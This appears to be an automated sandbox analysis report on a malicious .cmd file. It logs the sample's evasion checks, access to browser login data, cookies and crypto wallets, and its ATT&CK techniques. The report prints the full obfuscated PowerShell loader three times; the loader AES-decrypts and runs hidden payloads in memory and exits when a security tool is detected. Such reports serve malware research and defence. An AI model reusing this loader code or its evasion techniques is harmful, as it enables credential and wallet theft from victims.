      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4907Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4837Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1994Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6864Thread sleep time: -17524406870024063s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2788Thread sleep count: 1994 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3532Thread sleep count: 96 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7092Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: tmpEBDE.tmp.3.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: discord.comVMware20,11696494690f
      Source: tmpEBDE.tmp.3.drBinary or memory string: AMC password management pageVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: outlook.office.comVMware20,11696494690s
      Source: tmpEBDE.tmp.3.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
      Source: tmpEBDE.tmp.3.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
      Source: tmpEBDE.tmp.3.drBinary or memory string: interactivebrokers.comVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
      Source: tmpEBDE.tmp.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
      Source: tmpEBDE.tmp.3.drBinary or memory string: outlook.office365.comVMware20,11696494690t
      Source: tmpEBDE.tmp.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
      Source: tmpEBDE.tmp.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
      Source: tmpEBDE.tmp.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
      Source: tmpEBDE.tmp.3.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
      Source: tmpEBDE.tmp.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
      Source: tmpEBDE.tmp.3.drBinary or memory string: tasks.office.comVMware20,11696494690o
      Source: tmpEBDE.tmp.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
      Source: tmpEBDE.tmp.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: dev.azure.comVMware20,11696494690j
      Source: tmpEBDE.tmp.3.drBinary or memory string: global block list test formVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
      Source: tmpEBDE.tmp.3.drBinary or memory string: bankofamerica.comVMware20,11696494690x
      Source: tmpEBDE.tmp.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
      Source: tmpEBDE.tmp.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
      Source: tmpEBDE.tmp.3.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
      Source: tmpEBDE.tmp.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
      Source: tmpEBDE.tmp.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\z52PO0048857.cmd';$BczT='GeRVWptRVWpCRVWpurRVWpreRVWpntRVWpPRVWproRVWpcRVWpessRVWp'.Replace('RVWp', ''),'SpdpWdlitdpWd'.Replace('dpWd', ''),'EntUUZwrUUZwyPUUZwoUUZwinUUZwtUUZw'.Replace('UUZw', ''),'ElmNutemNutmmNutentmNutAtmNut'.Replace('mNut', ''),'LoZlRdadZlRd'.Replace('ZlRd', ''),'FriYMJomiYMJBiYMJasiYMJe64iYMJStiYMJriiYMJngiYMJ'.Replace('iYMJ', ''),'CDTtzhaDTtznDTtzgeDTtzExDTtzteDTtznsDTtzioDTtznDTtz'.Replace('DTtz', ''),'TrUPQEanUPQEsfUPQEormUPQEFUPQEiUPQEnUPQEalUPQEBUPQElocUPQEkUPQE'.Replace('UPQE', ''),'IqNQJnvqNQJoqNQJkeqNQJ'.Replace('qNQJ', ''),'CoqEENpqEENyqEENToqEEN'.Replace('qEEN', ''),'CrehWBeaehWBteehWBDehWBeehWBcehWBrypehWBtorehWB'.Replace('ehWB', ''),'MaQHwVinQHwVModQHwVuQHwVleQHwV'.Replace('QHwV', ''),'ReoviQadLoviQinoviQeoviQsoviQ'.Replace('oviQ', ''),'Devonzcomvonzpvonzrevonzssvonz'.Replace('vonz', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BczT[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function pWQul($PgjTo){$ArRhZ=[System.Security.Cryptography.Aes]::Create();$ArRhZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ArRhZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ArRhZ.Key=[System.Convert]::($BczT[5])('BCbtvIveY0T0lkWSkDxWOMe/c90s1PvXXJN390CRmts=');$ArRhZ.IV=[System.Convert]::($BczT[5])('JbfpGWq+SHjQD2Awma012A==');$BcXUN=$ArRhZ.($BczT[10])();$RcqyN=$BcXUN.($BczT[7])($PgjTo,0,$PgjTo.Length);$BcXUN.Dispose();$ArRhZ.Dispose();$RcqyN;}function iDUTr($PgjTo){$bKrDu=New-Object System.IO.MemoryStream(,$PgjTo);$gnvgt=New-Object System.IO.MemoryStream;$atXgD=New-Object System.IO.Compression.GZipStream($bKrDu,[IO.Compression.CompressionMode]::($BczT[13]));$atXgD.($BczT[9])($gnvgt);$atXgD.Dispose();$bKrDu.Dispose();$gnvgt.Dispose();$gnvgt.ToArray();}$XZgdm=[System.IO.File]::($BczT[12])([Console]::Title);$IbVAd=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 5).Substring(2))));$AAuWz=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 6).Substring(2))));[System.Reflection.Assembly]::($BczT[4])([byte[]]$AAuWz).($BczT[2]).($BczT[8])($null,$null);[System.Reflection.Assembly]::($BczT[4])([byte[]]$IbVAd).($BczT[2]).($BczT[8])($null,$null); "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\z52po0048857.cmd';$bczt='gervwptrvwpcrvwpurrvwprervwpntrvwpprvwprorvwpcrvwpessrvwp'.replace('rvwp', ''),'spdpwdlitdpwd'.replace('dpwd', ''),'entuuzwruuzwypuuzwouuzwinuuzwtuuzw'.replace('uuzw', ''),'elmnutemnutmmnutentmnutatmnut'.replace('mnut', ''),'lozlrdadzlrd'.replace('zlrd', ''),'friymjomiymjbiymjasiymje64iymjstiymjriiymjngiymj'.replace('iymj', ''),'cdttzhadttzndttzgedttzexdttztedttznsdttziodttzndttz'.replace('dttz', ''),'trupqeanupqesfupqeormupqefupqeiupqenupqealupqebupqelocupqekupqe'.replace('upqe', ''),'iqnqjnvqnqjoqnqjkeqnqj'.replace('qnqj', ''),'coqeenpqeenyqeentoqeen'.replace('qeen', ''),'crehwbeaehwbteehwbdehwbeehwbcehwbrypehwbtorehwb'.replace('ehwb', ''),'maqhwvinqhwvmodqhwvuqhwvleqhwv'.replace('qhwv', ''),'reoviqadloviqinoviqeoviqsoviq'.replace('oviq', ''),'devonzcomvonzpvonzrevonzssvonz'.replace('vonz', '');powershell -w hidden;$modules=[system.diagnostics.process]::($bczt[0])().modules;if ($modules -match 'hmpalert.dll') { exit; };function pwqul($pgjto){$arrhz=[system.security.cryptography.aes]::create();$arrhz.mode=[system.security.cryptography.ciphermode]::cbc;$arrhz.padding=[system.security.cryptography.paddingmode]::pkcs7;$arrhz.key=[system.convert]::($bczt[5])('bcbtvivey0t0lkwskdxwome/c90s1pvxxjn390crmts=');$arrhz.iv=[system.convert]::($bczt[5])('jbfpgwq+shjqd2awma012a==');$bcxun=$arrhz.($bczt[10])();$rcqyn=$bcxun.($bczt[7])($pgjto,0,$pgjto.length);$bcxun.dispose();$arrhz.dispose();$rcqyn;}function idutr($pgjto){$bkrdu=new-object system.io.memorystream(,$pgjto);$gnvgt=new-object system.io.memorystream;$atxgd=new-object system.io.compression.gzipstream($bkrdu,[io.compression.compressionmode]::($bczt[13]));$atxgd.($bczt[9])($gnvgt);$atxgd.dispose();$bkrdu.dispose();$gnvgt.dispose();$gnvgt.toarray();}$xzgdm=[system.io.file]::($bczt[12])([console]::title);$ibvad=idutr (pwqul ([convert]::($bczt[5])([system.linq.enumerable]::($bczt[3])($xzgdm, 5).substring(2))));$aauwz=idutr (pwqul ([convert]::($bczt[5])([system.linq.enumerable]::($bczt[3])($xzgdm, 6).substring(2))));[system.reflection.assembly]::($bczt[4])([byte[]]$aauwz).($bczt[2]).($bczt[8])($null,$null);[system.reflection.assembly]::($bczt[4])([byte[]]$ibvad).($bczt[2]).($bczt[8])($null,$null); "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\z52po0048857.cmd';$bczt='gervwptrvwpcrvwpurrvwprervwpntrvwpprvwprorvwpcrvwpessrvwp'.replace('rvwp', ''),'spdpwdlitdpwd'.replace('dpwd', ''),'entuuzwruuzwypuuzwouuzwinuuzwtuuzw'.replace('uuzw', ''),'elmnutemnutmmnutentmnutatmnut'.replace('mnut', ''),'lozlrdadzlrd'.replace('zlrd', ''),'friymjomiymjbiymjasiymje64iymjstiymjriiymjngiymj'.replace('iymj', ''),'cdttzhadttzndttzgedttzexdttztedttznsdttziodttzndttz'.replace('dttz', ''),'trupqeanupqesfupqeormupqefupqeiupqenupqealupqebupqelocupqekupqe'.replace('upqe', ''),'iqnqjnvqnqjoqnqjkeqnqj'.replace('qnqj', ''),'coqeenpqeenyqeentoqeen'.replace('qeen', ''),'crehwbeaehwbteehwbdehwbeehwbcehwbrypehwbtorehwb'.replace('ehwb', ''),'maqhwvinqhwvmodqhwvuqhwvleqhwv'.replace('qhwv', ''),'reoviqadloviqinoviqeoviqsoviq'.replace('oviq', ''),'devonzcomvonzpvonzrevonzssvonz'.replace('vonz', '');powershell -w hidden;$modules=[system.diagnostics.process]::($bczt[0])().modules;if ($modules -match 'hmpalert.dll') { exit; };function pwqul($pgjto){$arrhz=[system.security.cryptography.aes]::create();$arrhz.mode=[system.security.cryptography.ciphermode]::cbc;$arrhz.padding=[system.security.cryptography.paddingmode]::pkcs7;$arrhz.key=[system.convert]::($bczt[5])('bcbtvivey0t0lkwskdxwome/c90s1pvxxjn390crmts=');$arrhz.iv=[system.convert]::($bczt[5])('jbfpgwq+shjqd2awma012a==');$bcxun=$arrhz.($bczt[10])();$rcqyn=$bcxun.($bczt[7])($pgjto,0,$pgjto.length);$bcxun.dispose();$arrhz.dispose();$rcqyn;}function idutr($pgjto){$bkrdu=new-object system.io.memorystream(,$pgjto);$gnvgt=new-object system.io.memorystream;$atxgd=new-object system.io.compression.gzipstream($bkrdu,[io.compression.compressionmode]::($bczt[13]));$atxgd.($bczt[9])($gnvgt);$atxgd.dispose();$bkrdu.dispose();$gnvgt.dispose();$gnvgt.toarray();}$xzgdm=[system.io.file]::($bczt[12])([console]::title);$ibvad=idutr (pwqul ([convert]::($bczt[5])([system.linq.enumerable]::($bczt[3])($xzgdm, 5).substring(2))));$aauwz=idutr (pwqul ([convert]::($bczt[5])([system.linq.enumerable]::($bczt[3])($xzgdm, 6).substring(2))));[system.reflection.assembly]::($bczt[4])([byte[]]$aauwz).($bczt[2]).($bczt[8])($null,$null);[system.reflection.assembly]::($bczt[4])([byte[]]$ibvad).($bczt[2]).($bczt[8])($null,$null); "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: dump.pcap, type: PCAP
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
      Windows Management Instrumentation
      1
      DLL Side-Loading
      11
      Process Injection
      1
      Masquerading
      1
      OS Credential Dumping
      231
      Security Software Discovery
      Remote Services2
      Data from Local System
      11
      Non-Standard Port
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts22
      Command and Scripting Interpreter
      Boot or Logon Initialization Scripts1
      DLL Side-Loading
      241
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell
      Logon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager241
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets112
      System Information Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      z52PO0048857.cmd8%ReversingLabs
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
      https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
      https://duckduckgo.com/ac/?q=0%URL Reputationsafe
      http://crl.micro0%URL Reputationsafe
      https://aka.ms/pscore6lB0%URL Reputationsafe
      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
      https://www.ecosia.org/newtab/0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
